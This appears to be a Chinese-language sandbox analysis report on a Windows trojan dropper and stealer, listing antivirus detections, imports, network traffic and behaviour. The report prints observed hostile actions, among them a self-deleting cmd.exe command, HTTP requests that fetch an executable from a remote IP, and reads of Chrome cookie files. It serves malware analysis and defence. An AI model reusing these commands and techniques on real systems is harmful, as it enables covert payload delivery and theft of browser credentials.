10.6
0-day
60 个模型检测该样本为恶意!
重新分析
更多

b833d79953fe177a48a5832ce2606c41d00f0d5b9bd31ceb25d3055a3850c2f7

01d49b8835e13575499a041f1a2a2109.exe

分析耗时

82s

最近分析

文件大小

6.1MB
静态报毒 动态报毒 ADWAREFILETOUR ADXZ AGEN AI SCORE=86 AIDETECTVM AIVD ARTEMIS CONFIDENCE DOFOIL FARFLI GENERICKD HACKTOOL HIGH CONFIDENCE HLIQCC ISTARTSURF MALWARE1 MALWARE@#19WOKSKHD6YLZ MIKATZ MIMIKATZ MOKES MULTIPLE DETECTIONS MZYQS R002C0PJU20 R347145 SCORE SELFDEL STATIC AI SUSGEN SUSPICIOUS PE UNSAFE UOER URSU X7K4CVSW9EP XM5AQMXDCRA 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba TrojanDownloader:Win32/SelfDel.61780aca 20190527 0.3.0.5
Baidu Win32.Trojan.Farfli.bc 20190318 1.0.0.2
Avast Win32:Malware-gen 20201210 21.1.5827.0
McAfee Artemis!01D49B8835E1 20201211 6.0.6.653
Tencent Win32.Backdoor.Mokes.Fia 20201211 1.0.0.1
CrowdStrike win/malicious_confidence_70% (W) 20190702 1.0
静态指标
Command line console output was observed (2 个事件)
Time & API Arguments Status Return Repeated
1619149112.701499
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX3\driverbridge.exe
console_handle: 0x00000007
success 1 0
1619149112.716499
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
This executable has a PDB path (1 个事件)
pdb_path D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619149111.576124
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section .gfids
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name PNG
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://1.1.1.1/file1.exe
Performs some HTTP requests (1 个事件)
request GET http://1.1.1.1/file1.exe
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1619149116.951876
NtAllocateVirtualMemory
process_identifier: 3188
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00450000
success 0 0
Steals private information from local Internet browsers (10 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\All Users\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Public\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Oskar\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies-wal
file C:\Users\Default User\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Default\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
Creates executable files on the filesystem (10 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\wyfdggaa.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\id6.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\BTRSetp.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\Setup.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\DreamTrips.bat
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Data.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Data Files.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\driverbridge.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\lunch.bat
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Files.exe
Creates a suspicious process (1 个事件)
cmdline cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX3\driverbridge.exe"
Drops a binary and executes it (3 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Data.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\driverbridge.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\BTRSetp.exe
Drops an executable to the user AppData folder (8 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\driverbridge.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\wyfdggaa.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Data.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\Setup.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\id6.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Files.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX3\BTRSetp.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\Data Files.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619149110.951626
CreateProcessInternalW
thread_identifier: 880
thread_handle: 0x000000f4
process_identifier: 2420
current_directory:
filepath:
track: 1
command_line: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX3\driverbridge.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_handle: 0x0000010c
inherit_handles: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619149117.935876
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.384313436211137 section {'size_of_data': '0x00009200', 'virtual_address': '0x00067000', 'entropy': 7.384313436211137, 'name': '.rsrc', 'virtual_size': '0x000090f0'} description A section with a high entropy has been found
Uses Windows utilities for basic Windows functionality (2 个事件)
cmdline cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX3\driverbridge.exe"
cmdline ping 1.1.1.1 -n 1 -w 3000
网络通信
Communicates with host for which no DNS query was performed (3 个事件)
host 1.1.1.1
host 172.217.24.14
host 185.121.177.177
Queries information on disks, possibly for anti-virtualization (2 个事件)
Time & API Arguments Status Return Repeated
1619149110.763626
NtCreateFile
create_disposition: 1 (FILE_OPEN)
file_handle: 0x00000164
filepath: \??\PhysicalDrive0
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
filepath_r: \??\PhysicalDrive0
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 0 (FILE_SUPERSEDED)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
success 0 0
1619149110.763626
DeviceIoControl
input_buffer:
device_handle: 0x00000164
control_code: 2954240 ()
output_buffer:
success 1 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619149120.498876
RegSetValueExA
key_handle: 0x00000364
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619149120.498876
RegSetValueExA
key_handle: 0x00000364
value: (òô7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619149120.498876
RegSetValueExA
key_handle: 0x00000364
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619149120.498876
RegSetValueExW
key_handle: 0x00000364
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619149120.498876
RegSetValueExA
key_handle: 0x00000380
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619149120.498876
RegSetValueExA
key_handle: 0x00000380
value: (òô7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619149120.498876
RegSetValueExA
key_handle: 0x00000380
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619149120.529876
RegSetValueExW
key_handle: 0x00000360
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619149139.404876
RegSetValueExA
key_handle: 0x00000430
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619149139.404876
RegSetValueExA
key_handle: 0x00000430
value: Àèlýô7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619149139.404876
RegSetValueExA
key_handle: 0x00000430
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619149139.404876
RegSetValueExW
key_handle: 0x00000430
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619149139.404876
RegSetValueExA
key_handle: 0x0000042c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619149139.404876
RegSetValueExA
key_handle: 0x0000042c
value: Àèlýô7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619149139.404876
RegSetValueExA
key_handle: 0x0000042c
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Generates some ICMP traffic
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 117.18.237.29:80
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.33960517
FireEye Generic.mg.01d49b8835e13575
CAT-QuickHeal Trojan.Istartsurf
ALYac Trojan.GenericKD.33960517
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 00568e0f1 )
Alibaba TrojanDownloader:Win32/SelfDel.61780aca
K7GW Trojan ( 00568e0f1 )
Cybereason malicious.65e9d7
Arcabit Trojan.Generic.D2063245
Baidu Win32.Trojan.Farfli.bc
Cyren W32/Trojan.UOER-9367
Symantec Trojan.Gen.MBT
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Ursu-9476471-0
Kaspersky Backdoor.Win32.Mokes.aivd
BitDefender Trojan.GenericKD.33960517
NANO-Antivirus Trojan.Win32.Stealer.hliqcc
AegisLab Trojan.Win32.Mokes.m!c
Avast Win32:Malware-gen
Rising Spyware.Agent!8.C6 (TFE:5:x7K4CVsW9eP)
Ad-Aware Trojan.GenericKD.33960517
Sophos Mal/Generic-S
Comodo Malware@#19wokskhd6ylz
F-Secure Trojan.TR/AD.Dofoil.mzyqs
DrWeb Trojan.PWS.Stealer.28560
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0PJU20
McAfee-GW-Edition BehavesLike.Win32.AdwareFileTour.vc
MaxSecure Trojan.Malware.73983778.susgen
Emsisoft Trojan.GenericKD.33960517 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin TrojanSpy.Agent.adxz
Avira HEUR/AGEN.1139162
Antiy-AVL Trojan[PSW]/Win32.Mimikatz
Gridinsoft Trojan.Win32.Agent.oa!s5
Microsoft HackTool:Win32/Mikatz!dha
ZoneAlarm Backdoor.Win32.Mokes.aivd
GData Trojan.GenericKD.33960517
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Mimikatz.R347145
McAfee Artemis!01D49B8835E1
MAX malware (ai score=86)
VBA32 TrojanDownloader.Dofoil
Malwarebytes Trojan.Dropper
ESET-NOD32 multiple detections
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-03-26 18:02:53

Imports

Library KERNEL32.dll:
0x427000 GetLastError
0x427004 SetLastError
0x427008 FormatMessageW
0x42700c GetFileType
0x427010 GetStdHandle
0x427014 WriteFile
0x427018 ReadFile
0x42701c FlushFileBuffers
0x427020 SetEndOfFile
0x427024 SetFilePointer
0x427028 SetFileTime
0x42702c CloseHandle
0x427030 CreateFileW
0x427034 CreateDirectoryW
0x427038 SetFileAttributesW
0x42703c GetFileAttributesW
0x427040 DeleteFileW
0x427044 MoveFileW
0x427048 FindClose
0x42704c FindFirstFileW
0x427050 FindNextFileW
0x427054 GetVersionExW
0x42705c GetFullPathNameW
0x427060 FoldStringW
0x427064 GetModuleFileNameW
0x427068 GetModuleHandleW
0x42706c FindResourceW
0x427070 FreeLibrary
0x427074 GetProcAddress
0x427078 GetCurrentProcessId
0x42707c ExitProcess
0x427084 Sleep
0x427088 LoadLibraryW
0x42708c GetSystemDirectoryW
0x427090 CompareStringW
0x427094 AllocConsole
0x427098 FreeConsole
0x42709c AttachConsole
0x4270a0 WriteConsoleW
0x4270b8 GetCPInfo
0x4270bc IsDBCSLeadByte
0x4270c0 MultiByteToWideChar
0x4270c4 WideCharToMultiByte
0x4270c8 GlobalAlloc
0x4270cc LockResource
0x4270d0 GlobalLock
0x4270d4 GlobalUnlock
0x4270d8 GlobalFree
0x4270dc LoadResource
0x4270e0 SizeofResource
0x4270e8 GetExitCodeProcess
0x4270ec WaitForSingleObject
0x4270f0 GetLocalTime
0x4270f4 GetTickCount
0x4270f8 MapViewOfFile
0x4270fc UnmapViewOfFile
0x427100 CreateFileMappingW
0x427104 OpenFileMappingW
0x427108 GetCommandLineW
0x427114 GetTempPathW
0x427118 MoveFileExW
0x42711c GetLocaleInfoW
0x427120 GetTimeFormatW
0x427124 GetDateFormatW
0x427128 GetNumberFormatW
0x42712c SetFilePointerEx
0x427130 GetConsoleMode
0x427134 GetConsoleCP
0x427138 HeapSize
0x42713c SetStdHandle
0x427140 GetProcessHeap
0x427144 RaiseException
0x427148 GetSystemInfo
0x42714c VirtualProtect
0x427150 VirtualQuery
0x427154 LoadLibraryExA
0x42715c IsDebuggerPresent
0x427168 GetStartupInfoW
0x427170 GetCurrentThreadId
0x427178 InitializeSListHead
0x42717c GetCurrentProcess
0x427180 TerminateProcess
0x427184 RtlUnwind
0x427188 EncodePointer
0x42719c TlsAlloc
0x4271a0 TlsGetValue
0x4271a4 TlsSetValue
0x4271a8 TlsFree
0x4271ac LoadLibraryExW
0x4271b4 GetModuleHandleExW
0x4271b8 GetModuleFileNameA
0x4271bc GetACP
0x4271c0 HeapFree
0x4271c4 HeapAlloc
0x4271c8 HeapReAlloc
0x4271cc GetStringTypeW
0x4271d0 LCMapStringW
0x4271d4 FindFirstFileExA
0x4271d8 FindNextFileA
0x4271dc IsValidCodePage
0x4271e0 GetOEMCP
0x4271e4 GetCommandLineA
0x4271f0 DecodePointer
Library gdiplus.dll:
0x4271f8 GdiplusShutdown
0x4271fc GdiplusStartup
0x42720c GdipDisposeImage
0x427210 GdipCloneImage
0x427214 GdipFree
0x427218 GdipAlloc

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 64133 1.1.1.1 80
192.168.56.101 64134 1.1.1.1 443
192.168.56.101 64139 1.1.1.1 443
192.168.56.101 64140 1.1.1.1 80
192.168.56.101 64141 1.1.1.1 443
192.168.56.101 64142 1.1.1.1 443
192.168.56.101 64143 1.1.1.1 80
192.168.56.101 64132 185.121.177.177 53

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 60088 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 57756 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://1.1.1.1/file1.exe 
GET /file1.exe HTTP/1.1
Host: 1.1.1.1
Connection: Keep-Alive
http://1.1.1.1/file1.exe 
GET /file1.exe HTTP/1.1
Connection: Keep-Alive
Host: 1.1.1.1
http://1.1.1.1/file1.exe 
GET /file1.exe HTTP/1.1
Host: 1.1.1.1

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.